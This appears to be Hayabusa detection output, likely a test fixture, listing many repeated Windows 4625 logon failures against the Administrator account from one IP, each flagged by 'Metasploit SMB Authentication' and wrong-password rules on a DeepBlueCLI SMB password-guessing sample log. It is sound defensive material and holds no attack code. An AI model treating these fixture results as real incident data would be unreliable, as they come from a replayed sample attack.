+2016-09-20 01:51:07.841 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.883 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: E0ZkcAD0IakqSUph  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.883 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5HgksdIGukmliZeE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.924 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.966 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xYoLckmmOWCSf4Q2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.966 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2PTxr8Zkz2y2XwBo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.000 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: J3caypkIM2XqoSSF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.044 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yuQOUzJ6sU5AhARR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.088 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SyM3OrjUHub9k23k  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.128 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.171 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vY7SRoWumGQOrljW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.171 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: iFrO2nUMlfeDLGyc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.212 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.250 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9B8Gq7d30U8DqdN0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.250 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yxSPuxpCHgSo1d1a  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.292 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.342 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9elGZ4POExblUCAK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.342 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XHY9Ig3sqQKNXYqq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.385 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: voMDzTqYqKpfudKo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.424 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: m8m9SJ1aFpvFqClU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.457 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.496 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dM84lQYVfHhZmgpK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.496 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.541 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: O5FrdBbYXWaqFkeb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.541 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.588 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZxiNMjsd3YfoCNa2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.588 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.628 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: v1u5uD9SiDFq9VOD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.628 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.675 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pZv9l3b7U8tIVmw8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.675 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.716 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7EfPqiBhm6hRX700  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.716 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.763 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3uvqgri2KGIDAlg1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.763 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: oLXZMXKsjOaurgZV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.816 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nXtiRWHDJqpq69Ej  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.860 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.915 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OeC1T9YkT1hXMcGG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.915 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YPf6nlwAeuu7cf00  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.965 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4fvVUozD2RuIchN4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.008 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KP3rghcrgas3l3q1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.052 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.084 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MMtcQYoVoM57gTcj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.084 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.137 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IFjTWECEep09Abjt  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.137 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.177 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jUlguy8tKBo4DSUR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.177 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GETwMERLpiVtMRkw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.212 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Bhas9Vjc193EVcOg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.248 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OmVAnxq39t7qbcEs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.288 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.332 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 13y2nnltjipwZqth  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.332 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.369 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wDQrPBL1VodIcQLR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.369 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: K0Mp4jXeHd3b0CLw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.417 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.472 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3j89GmIDnG4v7JJC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.472 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.512 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xyRLZMoaXJUrPPfn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.512 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.607 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZcoyOKUjEi1uCSpD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.607 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jWQGVJLcVwgf4YJ8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.648 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mrFqG85mmjTYJ4A9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.688 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6DqIh1QHTk470nrU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.728 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: feVbA94p6iT2pBeC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.774 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.804 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: T30YHcE8ZG7FaxW7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.804 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
